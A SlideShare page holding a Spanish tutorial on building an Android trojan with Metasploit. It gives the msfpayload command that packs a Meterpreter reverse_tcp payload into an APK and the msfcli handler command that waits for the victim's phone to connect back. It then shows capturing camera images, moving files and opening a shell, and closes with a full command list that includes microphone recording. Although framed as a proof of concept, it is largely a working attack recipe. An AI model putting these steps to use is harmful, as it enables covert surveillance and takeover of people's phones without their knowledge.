SlideShare una empresa de Scribd logo

Meterpreter en android el desembarco en tu smartphone

J
JASENT

LINUX 2015

Internet
1 de 6
Descargar para leer sin conexión
Meterpreter en Android: El desembarco en tu Smartphone Cuando leí la noticia, gracias al post de José Selvi en su blog, me pareció algo normal y que era cuestión de tiempo. Aprovecharse del meterpreter de Java, para mudarlo a Android, sabiendo la conexión que hay entre ambos era cuestión de tiempo. Un meterpreter corriendo en mi smartphone es una de las cosas que menos gracia me podría hacer, si no se tratase de una prueba de concepto. La aplicación para generar el APK será msfpayload, con esta herramienta podemos generar shellcodes, tanto para lenguajes como C, Javascript, Ruby, como generar archivos binarios, los cuales contengan la shellcode. El caso típico es el de nuestro troyano casero, o como generar un EXE con un Meterpreter de tipo inverso. En este caso, utilizaremos la aplicación msfpayload para generar un APK para Android, el cual tendrá un Main Activity un tanto curioso, y es que realmente lo que ejecutará será el Meterpreter de Java modificado para poder correr en un Android. Utilizaremos msfcli para recibir la conexión inversa que es generada por la shellcode que se ejecuta en el terminal. En primer lugar generamos el APK con la instrucción: “msfpayload android/meterpreter/reverse_tcp LHOST=<IP donde esperaremos> LPORT=<puerto donde se debe conectar> R > meter.apk” Ejemplo: Una vez generado el bichito, lo que haremos es configurar msfcli para recibir la conexión inversa… esperaremos a que el bichito vuelva a casa. Para ello, configuramos la herramienta de la siguiente manera: “msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=<IP donde queremos que vuelva o por donde recibiremos las conexiones>” Ejemplo:
Una vez que la víctima ejecute el APK se ejecutará la shellcode que se encuentra dentro del binario, provocando la conexión inversa. Acordaros que Meterpreter es de tipo Stager, por lo que se realizará en dos etapas, primera de conexión y segunda de funcionalidades. Ya disponemos de la sesión inversa y ¿Qué podemos hacer con esto? Más adelante os dejamos un listado de comandos disponibles en este Meterpreter, más que nada las cosas que podrías hacer con un Meterpreter de Java. Bien, como ejemplo gráfico vamos a lanzar la captura de una imagen a través de la cámara del propio dispositivo, mediante el uso del comando webcam_snap. Con el comando webcam_listpodemos listar las cámaras que dispone el dispositivo (frontal, trasera). Un ejemplo de captura de imagen de la cámara frontal del smartphone en el que se ejecuta la shellcode:
También disponemos los comandos upload y download, para descargar y subir archivos al dispositivo, además de una shell tal y como se puede visualizar en la imagen: Por último, me paré a ver que podemos ver en el intérprete de Ruby, irb. Este tema es realmente interesante, ya que permitirá a los interesados ahondar en el desarrollo de scripts de Meterpreter, del cual ya hemos hablado en Flu Project. Próximamente continuaremos con este interesante tema, entender a bajo nivel como funciona Meterpreter, y como con Ruby y la “API” de Meterpreter podemos hacer cosas muy interesantes. Comandos utilizables con el Meterpreter de Android: Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode load Load one or more meterpreter extensions quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for 'load' write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory
lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table Stdapi: System Commands ======================= Command Description ------- ----------- execute Execute a command getuid Get the user that the server is running as ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_list List webcams webcam_snap Take a snapshot from the specified webcam

Recomendados

Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bisFrancesc Perez
 
Db autopwn backtrack_5
Db autopwn backtrack_5Db autopwn backtrack_5
Db autopwn backtrack_5Jeffry Roldan
 
Seguridad: Ataque UNICODE
Seguridad: Ataque UNICODESeguridad: Ataque UNICODE
Seguridad: Ataque UNICODEFrancesc Perez
 
Actividad 6.7.2.2
Actividad 6.7.2.2Actividad 6.7.2.2
Actividad 6.7.2.2Daniel2801 Jose
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónFrancesc Perez
 
Testing efectivo en ASP Net Core
Testing efectivo en ASP Net CoreTesting efectivo en ASP Net Core
Testing efectivo en ASP Net CoreNacho Fanjul Corteguera
 
06.asterisk administracion
06.asterisk administracion06.asterisk administracion
06.asterisk administracionDelphini Systems Consultoria e Treinamento
 

Recomendados

Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bisFrancesc Perez
 
Db autopwn backtrack_5
Db autopwn backtrack_5Db autopwn backtrack_5
Db autopwn backtrack_5Jeffry Roldan
 
Seguridad: Ataque UNICODE
Seguridad: Ataque UNICODESeguridad: Ataque UNICODE
Seguridad: Ataque UNICODEFrancesc Perez
 
Actividad 6.7.2.2
Actividad 6.7.2.2Actividad 6.7.2.2
Actividad 6.7.2.2Daniel2801 Jose
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2 Francesc Perez
 
Seguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónSeguridad: Ataque Unicode Solución
Seguridad: Ataque Unicode SoluciónFrancesc Perez
 
Testing efectivo en ASP Net Core
Testing efectivo en ASP Net CoreTesting efectivo en ASP Net Core
Testing efectivo en ASP Net CoreNacho Fanjul Corteguera
 
06.asterisk administracion
06.asterisk administracion06.asterisk administracion
06.asterisk administracionDelphini Systems Consultoria e Treinamento
 
Ruby EventMachine + em-WebSocket
Ruby EventMachine + em-WebSocketRuby EventMachine + em-WebSocket
Ruby EventMachine + em-WebSocketCarlos Vasquez
 
Utilización de Ssh entre varios servidores.
Utilización de Ssh entre varios servidores.Utilización de Ssh entre varios servidores.
Utilización de Ssh entre varios servidores.Javier Martin Rivero
 
Repaso
RepasoRepaso
RepasoFranciscoruben
 
Taller en clase de redes
Taller en clase de redesTaller en clase de redes
Taller en clase de redesfranciscorugeles1
 
Presentacion: ¿Que es Compilador?
Presentacion: ¿Que es Compilador? Presentacion: ¿Que es Compilador?
Presentacion: ¿Que es Compilador? Luis Stifler
 
Java
Java Java
Java Sonia Mamani Quispe
 
Ingeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo iiIngeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo iiFreelance
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
CuckoosandboxTensor
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018Matías Moreno Cárdenas
 
Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdfJosé Moreno
 
Java jaucito
Java jaucitoJava jaucito
Java jaucitoJose Jaucito
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Telefónica
 
Troyanizando y Auditando Android - HoneyCON
Troyanizando y Auditando Android - HoneyCONTroyanizando y Auditando Android - HoneyCON
Troyanizando y Auditando Android - HoneyCONMatías Moreno Cárdenas
 
Present3
Present3Present3
Present3Rafael Cornejo Martinez
 
Labview & pic
Labview & picLabview & pic
Labview & picJuan Hoyos
 
Breve introducción práctica al DevOps - (es) 2021_03_18
Breve introducción práctica al DevOps - (es) 2021_03_18Breve introducción práctica al DevOps - (es) 2021_03_18
Breve introducción práctica al DevOps - (es) 2021_03_18Young Suk Ahn Park
 
Introducción a la programación del amigo bot
Introducción a la programación del amigo botIntroducción a la programación del amigo bot
Introducción a la programación del amigo botjhonsoomelol
 
GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...
GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...
GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...Ivan Petrlik
 
Php Bitter Sweet Symfony!
Php Bitter Sweet Symfony!Php Bitter Sweet Symfony!
Php Bitter Sweet Symfony!Ricard Luquero
 
U2 Etapas programación -Diseño de Productos Electrónicos con Microcontroladores
U2 Etapas programación -Diseño de Productos Electrónicos con MicrocontroladoresU2 Etapas programación -Diseño de Productos Electrónicos con Microcontroladores
U2 Etapas programación -Diseño de Productos Electrónicos con MicrocontroladoresSENA
 

Más contenido relacionado

La actualidad más candente

Ruby EventMachine + em-WebSocket
Ruby EventMachine + em-WebSocketRuby EventMachine + em-WebSocket
Ruby EventMachine + em-WebSocketCarlos Vasquez
 
Utilización de Ssh entre varios servidores.
Utilización de Ssh entre varios servidores.Utilización de Ssh entre varios servidores.
Utilización de Ssh entre varios servidores.Javier Martin Rivero
 
Presentacion: ¿Que es Compilador?
Presentacion: ¿Que es Compilador? Presentacion: ¿Que es Compilador?
Presentacion: ¿Que es Compilador? Luis Stifler
 

La actualidad más candente (6)

Ruby EventMachine + em-WebSocket
Ruby EventMachine + em-WebSocketRuby EventMachine + em-WebSocket
Ruby EventMachine + em-WebSocket
 
Utilización de Ssh entre varios servidores.
Utilización de Ssh entre varios servidores.Utilización de Ssh entre varios servidores.
Utilización de Ssh entre varios servidores.
 
Repaso
RepasoRepaso
Repaso
 
Taller en clase de redes
Taller en clase de redesTaller en clase de redes
Taller en clase de redes
 
Presentacion: ¿Que es Compilador?
Presentacion: ¿Que es Compilador? Presentacion: ¿Que es Compilador?
Presentacion: ¿Que es Compilador?
 
Java
Java Java
Java
 

Similar a Meterpreter en android el desembarco en tu smartphone

Ingeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo iiIngeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo iiFreelance
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
CuckoosandboxTensor
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018Matías Moreno Cárdenas
 
Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdfJosé Moreno
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Telefónica
 
Troyanizando y Auditando Android - HoneyCON
Troyanizando y Auditando Android - HoneyCONTroyanizando y Auditando Android - HoneyCON
Troyanizando y Auditando Android - HoneyCONMatías Moreno Cárdenas
 
Breve introducción práctica al DevOps - (es) 2021_03_18
Breve introducción práctica al DevOps - (es) 2021_03_18Breve introducción práctica al DevOps - (es) 2021_03_18
Breve introducción práctica al DevOps - (es) 2021_03_18Young Suk Ahn Park
 
Introducción a la programación del amigo bot
Introducción a la programación del amigo botIntroducción a la programación del amigo bot
Introducción a la programación del amigo botjhonsoomelol
 
GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...
GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...
GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...Ivan Petrlik
 
Php Bitter Sweet Symfony!
Php Bitter Sweet Symfony!Php Bitter Sweet Symfony!
Php Bitter Sweet Symfony!Ricard Luquero
 
U2 Etapas programación -Diseño de Productos Electrónicos con Microcontroladores
U2 Etapas programación -Diseño de Productos Electrónicos con MicrocontroladoresU2 Etapas programación -Diseño de Productos Electrónicos con Microcontroladores
U2 Etapas programación -Diseño de Productos Electrónicos con MicrocontroladoresSENA
 
IOF Labs Weekend - Android (27082011)
IOF Labs Weekend - Android (27082011)IOF Labs Weekend - Android (27082011)
IOF Labs Weekend - Android (27082011)repcax
 
Herramientas y plugins para el desarrollo de aplicaciones cloud native para K...
Herramientas y plugins para el desarrollo de aplicaciones cloud native para K...Herramientas y plugins para el desarrollo de aplicaciones cloud native para K...
Herramientas y plugins para el desarrollo de aplicaciones cloud native para K...Micael Gallego
 
Beef framework 2016
Beef framework 2016Beef framework 2016
Beef framework 2016Tensor
 
Maitaining access
Maitaining accessMaitaining access
Maitaining accessTensor
 

Similar a Meterpreter en android el desembarco en tu smartphone (20)

Ingeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo iiIngeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo ii
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Cuckoosandbox
CuckoosandboxCuckoosandbox
Cuckoosandbox
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018
 
Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdf
 
Java jaucito
Java jaucitoJava jaucito
Java jaucito
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2
 
Troyanizando y Auditando Android - HoneyCON
Troyanizando y Auditando Android - HoneyCONTroyanizando y Auditando Android - HoneyCON
Troyanizando y Auditando Android - HoneyCON
 
Present3
Present3Present3
Present3
 
Labview & pic
Labview & picLabview & pic
Labview & pic
 
Breve introducción práctica al DevOps - (es) 2021_03_18
Breve introducción práctica al DevOps - (es) 2021_03_18Breve introducción práctica al DevOps - (es) 2021_03_18
Breve introducción práctica al DevOps - (es) 2021_03_18
 
Introducción a la programación del amigo bot
Introducción a la programación del amigo botIntroducción a la programación del amigo bot
Introducción a la programación del amigo bot
 
GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...
GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...
GUIA DE LABORATORIO PHONE GAP JQUERY MOBILE CARGADO DE_DATOS_DE_REGISTROS...
 
Php Bitter Sweet Symfony!
Php Bitter Sweet Symfony!Php Bitter Sweet Symfony!
Php Bitter Sweet Symfony!
 
U2 Etapas programación -Diseño de Productos Electrónicos con Microcontroladores
U2 Etapas programación -Diseño de Productos Electrónicos con MicrocontroladoresU2 Etapas programación -Diseño de Productos Electrónicos con Microcontroladores
U2 Etapas programación -Diseño de Productos Electrónicos con Microcontroladores
 
IOF Labs Weekend - Android (27082011)
IOF Labs Weekend - Android (27082011)IOF Labs Weekend - Android (27082011)
IOF Labs Weekend - Android (27082011)
 
Herramientas y plugins para el desarrollo de aplicaciones cloud native para K...
Herramientas y plugins para el desarrollo de aplicaciones cloud native para K...Herramientas y plugins para el desarrollo de aplicaciones cloud native para K...
Herramientas y plugins para el desarrollo de aplicaciones cloud native para K...
 
Beef framework 2016
Beef framework 2016Beef framework 2016
Beef framework 2016
 
Maitaining access
Maitaining accessMaitaining access
Maitaining access
 

Último

Buscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webBuscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webDecaunlz
 
Institucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenaInstitucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenadanielaerazok
 
Guia para el registro en el sitio slideshare.pdf
Guia para el registro en el sitio slideshare.pdfGuia para el registro en el sitio slideshare.pdf
Guia para el registro en el sitio slideshare.pdflauradbernals
 
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdfNUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdfisrael garcia
 
institucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenainstitucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenajuniorcuellargomez
 
12 Clasificacion de las Computadoras.pdf
12 Clasificacion de las Computadoras.pdf12 Clasificacion de las Computadoras.pdf
12 Clasificacion de las Computadoras.pdfedwinmelgarschlink2
 
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAINSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAdanielaerazok
 
COMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfCOMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfOscarBlas6
 

Último (8)

Buscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la webBuscadores, SEM SEO: el desafío de ser visto en la web
Buscadores, SEM SEO: el desafío de ser visto en la web
 
Institucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalenaInstitucion educativa la esperanza sede la magdalena
Institucion educativa la esperanza sede la magdalena
 
Guia para el registro en el sitio slideshare.pdf
Guia para el registro en el sitio slideshare.pdfGuia para el registro en el sitio slideshare.pdf
Guia para el registro en el sitio slideshare.pdf
 
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdfNUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
NUVO PROGRAMAS DE ESCUELAS NUEVO-ACUERDO-CTE.pdf
 
institucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalenainstitucion educativa la esperanza sede magdalena
institucion educativa la esperanza sede magdalena
 
12 Clasificacion de las Computadoras.pdf
12 Clasificacion de las Computadoras.pdf12 Clasificacion de las Computadoras.pdf
12 Clasificacion de las Computadoras.pdf
 
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENAINSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
INSTITUCION EDUCATIVA LA ESPERANZA SEDE MAGDALENA
 
COMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdfCOMPETENCIAS CIUDADANASadadadadadadada .pdf
COMPETENCIAS CIUDADANASadadadadadadada .pdf
 

Meterpreter en android el desembarco en tu smartphone

  • 1. Meterpreter en Android: El desembarco en tu Smartphone Cuando leí la noticia, gracias al post de José Selvi en su blog, me pareció algo normal y que era cuestión de tiempo. Aprovecharse del meterpreter de Java, para mudarlo a Android, sabiendo la conexión que hay entre ambos era cuestión de tiempo. Un meterpreter corriendo en mi smartphone es una de las cosas que menos gracia me podría hacer, si no se tratase de una prueba de concepto. La aplicación para generar el APK será msfpayload, con esta herramienta podemos generar shellcodes, tanto para lenguajes como C, Javascript, Ruby, como generar archivos binarios, los cuales contengan la shellcode. El caso típico es el de nuestro troyano casero, o como generar un EXE con un Meterpreter de tipo inverso. En este caso, utilizaremos la aplicación msfpayload para generar un APK para Android, el cual tendrá un Main Activity un tanto curioso, y es que realmente lo que ejecutará será el Meterpreter de Java modificado para poder correr en un Android. Utilizaremos msfcli para recibir la conexión inversa que es generada por la shellcode que se ejecuta en el terminal. En primer lugar generamos el APK con la instrucción: “msfpayload android/meterpreter/reverse_tcp LHOST=<IP donde esperaremos> LPORT=<puerto donde se debe conectar> R > meter.apk” Ejemplo: Una vez generado el bichito, lo que haremos es configurar msfcli para recibir la conexión inversa… esperaremos a que el bichito vuelva a casa. Para ello, configuramos la herramienta de la siguiente manera: “msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=<IP donde queremos que vuelva o por donde recibiremos las conexiones>” Ejemplo:
  • 2. Una vez que la víctima ejecute el APK se ejecutará la shellcode que se encuentra dentro del binario, provocando la conexión inversa. Acordaros que Meterpreter es de tipo Stager, por lo que se realizará en dos etapas, primera de conexión y segunda de funcionalidades. Ya disponemos de la sesión inversa y ¿Qué podemos hacer con esto? Más adelante os dejamos un listado de comandos disponibles en este Meterpreter, más que nada las cosas que podrías hacer con un Meterpreter de Java. Bien, como ejemplo gráfico vamos a lanzar la captura de una imagen a través de la cámara del propio dispositivo, mediante el uso del comando webcam_snap. Con el comando webcam_listpodemos listar las cámaras que dispone el dispositivo (frontal, trasera). Un ejemplo de captura de imagen de la cámara frontal del smartphone en el que se ejecuta la shellcode:
  • 3. También disponemos los comandos upload y download, para descargar y subir archivos al dispositivo, además de una shell tal y como se puede visualizar en la imagen: Por último, me paré a ver que podemos ver en el intérprete de Ruby, irb. Este tema es realmente interesante, ya que permitirá a los interesados ahondar en el desarrollo de scripts de Meterpreter, del cual ya hemos hablado en Flu Project. Próximamente continuaremos con este interesante tema, entender a bajo nivel como funciona Meterpreter, y como con Ruby y la “API” de Meterpreter podemos hacer cosas muy interesantes. Comandos utilizables con el Meterpreter de Android: Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread
  • 4. channel Displays information about active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session help Help menu info Displays information about a Post module interact Interacts with a channel irb Drop into irb scripting mode load Load one or more meterpreter extensions quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module use Deprecated alias for 'load' write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory
  • 5. lpwd Print local working directory ls List files mkdir Make directory pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table Stdapi: System Commands ======================= Command Description ------- ----------- execute Execute a command getuid Get the user that the server is running as ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS
  • 6. Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_list List webcams webcam_snap Take a snapshot from the specified webcam